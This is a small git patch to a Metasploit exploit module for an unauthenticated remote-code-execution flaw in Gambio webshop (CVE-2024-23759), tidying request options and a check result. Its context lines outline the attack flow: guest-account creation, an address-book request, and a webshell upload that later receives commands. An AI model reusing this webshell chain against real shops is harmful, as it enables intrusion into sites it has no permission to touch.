From 9f50f12e6ed96b27ad2650ac502feaa7a289385b Mon Sep 17 00:00:00 2001 From: h00die-gr3y Date: Thu, 28 Mar 2024 18:16:11 +0000 Subject: [PATCH] update addressing cdelafuente-r7 comments --- .../exploits/multi/http/gambio_unauth_rce_cve_2024_23759.rb | 6 +----- 1 file changed, 1 insertion(+), 5 deletions(-) diff --git a/modules/exploits/multi/http/gambio_unauth_rce_cve_2024_23759.rb b/modules/exploits/multi/http/gambio_unauth_rce_cve_2024_23759.rb index 4deff0cc8b66..0c6be38fac1b 100644 --- a/modules/exploits/multi/http/gambio_unauth_rce_cve_2024_23759.rb +++ b/modules/exploits/multi/http/gambio_unauth_rce_cve_2024_23759.rb @@ -102,7 +102,6 @@ def execute_php(cmd, _opts = {}) send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, @webshell_name), - 'ctype' => 'application/x-www-form-urlencoded', 'vars_post' => { @post_param => payload } @@ -115,7 +114,6 @@ def execute_command(cmd, _opts = {}) send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, @webshell_name), - 'ctype' => 'application/x-www-form-urlencoded', 'vars_get' => { @get_param => php_cmd_function }, @@ -158,7 +156,6 @@ def upload_webshell res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'shop.php?do=CreateGuest/Proceed'), - 'ctype' => 'application/x-www-form-urlencoded', 'keep_cookies' => true, 'vars_post' => { 'firstname' => firstname, @@ -181,7 +178,6 @@ def upload_webshell res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'shop.php?do=Parcelshopfinder/AddAddressBookEntry'), - 'ctype' => 'application/x-www-form-urlencoded', 'keep_cookies' => true, 'vars_post' => { 'checkout_started' => 0, @@ -215,7 +211,7 @@ def check # Search for "Gambio" on the login page return CheckCode::Safe unless res.body.include?('gambio') - CheckCode::Appears('It looks like Gambio Webshop is running.') + CheckCode::Detected('It looks like Gambio Webshop is running.') end def exploit